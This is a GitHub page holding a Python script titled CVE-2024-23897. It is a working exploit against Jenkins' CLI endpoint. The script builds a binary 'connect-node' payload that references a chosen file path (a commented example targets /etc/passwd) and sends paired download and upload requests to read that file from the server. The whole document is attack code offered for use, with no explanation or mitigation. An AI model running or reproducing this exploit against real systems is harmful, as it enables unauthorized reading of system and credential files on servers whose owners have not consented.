-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-23897.py
79 lines (66 loc) · 2.34 KB
/
CVE-2024-23897.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import argparse
from uuid import uuid4
from requests import Session, post, exceptions
from time import sleep
from threading import Thread
def request1(url,uuidval,params):
session = Session()
headers = {"Side": "download", "Session": uuidval}
proxy = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
try:
response = session.post(url, params=params, headers=headers, proxies=proxy)
except (exceptions.ConnectTimeout, exceptions.ConnectionError):
print("Could not connect to target to setup the listener.")
exit(1)
def request2(url,uuidval,params,payload):
sleep(0.5)
session = Session()
headers = {"Side": "upload", "Session": uuidval}
#payload = b"\x00\x00\x00\x0E\x00\x00\x0Cconnect-node\x00\x00\x00\x0E\x00\x00\x0C@/etc/passwd\x03"
payload = payload
proxy = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
try:
post(url, data=payload, params=params, headers=headers, proxies=proxy)
except (exceptions.ConnectTimeout, exceptions.ConnectionError):
print("Could not connect to the target to send the request.")
def createpayload(a: int, path: str) -> bytes:
text_bytes = bytes(path, "utf-8")
text_size = len(text_bytes)
text_message = text_size.to_bytes(2) + text_bytes
message_size = len(text_message)
payload = message_size.to_bytes(4) + a.to_bytes(1) + text_message
return payload
def get_payload(filepath: str) -> bytes:
a = 0
b = 3
command = createpayload(a, "connect-node")
path = createpayload(a, f"@{filepath}")
payload = command + path + b.to_bytes(1)
return payload
def main():
parser = argparse.ArgumentParser(description="CVE-2024-23897")
parser.add_argument("-u", '--url', required=True, help="The target URL")
parser.add_argument("-p", '--path', required=True, help="The target Path")
args = parser.parse_args()
url = args.url + '/cli'
filepath = args.path
params = {"remoting":"false"}
uuidval = str(uuid4())
payload = get_payload(filepath)
thread1 = Thread(target=request1, args=(url,uuidval,params))
thread2 = Thread(target=request2, args=(url,uuidval,params,payload))
thread1.daemon = True
thread2.daemon = True
thread1.start()
sleep(1)
thread2.start()
thread1.join()
thread2.join()
if __name__ == "__main__":
main()